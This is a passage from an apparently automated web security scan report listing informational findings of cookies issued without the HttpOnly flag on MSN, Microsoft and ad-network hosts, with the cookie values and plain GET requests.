Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/inc/Attributions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.316. http://redacted/personal-finance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/personal-finance/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-finance/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.317. http://movies.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.318. http://movies.redacted/academy-awards/snubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/academy-awards/snubs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.319. http://movies.redacted/jason-statham/photo-gallery/feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/jason-statham/photo-gallery/feature/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.320. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.321. http://movies.redacted/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.322. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.323. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.324. http://movies.redacted/showtimes/showtimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/showtimes/showtimes.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
MC1=V=3&GUID=9fe02721dc3a4a9c834efd7852955ccc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.325. http://movies.redacted/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.326. http://msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
Sto.UserLocale=en-us; path=/
A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.327. http://msdn.microsoft.com/en-us/library/cc838158(VS.95 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/cc838158(VS.95

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.328. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/cc838158(VS.95).aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.329. http://msdn.microsoft.com/en-us/library/ff637515(VS.92 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/ff637515(VS.92

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.330. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/ff637515(VS.92).aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.331. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/jobseeker/jobs/jobResults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.332. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.333. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.334. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 0
Content-Type: text/plain
Connection: close

17.335. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.336. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0} previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnportal.112.2o7.net
Path:	/b/ss/msnportalhome/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.337. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnportal.112.2o7.net
Path:	/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.338. http://music.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.redacted
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.339. http://my.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.live.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
mkt1=norm=en-us; domain=live.com; path=/
mkt2=ui=en-us; domain=my.live.com; path=/
lastMarket=en-us; domain=.live.com; path=/
lastMktPath=en/us; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.340. http://my.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.redacted
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc03049.popsci.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.342. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.scientificamerican.com
Path:	/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.343. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.344. http://onlinehelp.microsoft.com/en-us/msn/money.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/money.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/money.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.345. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/qwlinfo.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlinfo.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.346. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/qwlnotyours.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlnotyours.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.347. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.348. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7665/13236/25159-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; expires=Sat, 30-Apr-2011 01:29:43 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=7665/13236; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=7531^1&13236^1; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=109816; path=/; domain=.rubiconproject.com
csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 01:29:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.349. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.350. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU+FbxIQlVNYvPsemd1+k2RVNJ84PixU5WRr0r6Qywadg+otlqGxKr7OS2Tzwu4/In5EGUAqJWLB0DOxgg/CuOXW8YP+vFRmMjOLHe04PzvmT/vqkZ5VMxzqzXrrENqLroKKf6k341pRrKSaywJJTHEgZhWrYFVTKHcr5jXkc94hOIoKl1bm0QymdMHOj+nrIpL/JfZ7r/Uig5xRzUD4U0LWwa2N+zYoP8sqyQqHnKJCkHB+/FJZtglBhjUBpyF9uVhwdrX8M1fM90HAYCHrIlO/SjgkS/Jvwa4v7A==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/
NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 01:29:45 GMT; Path=/
rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.351. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
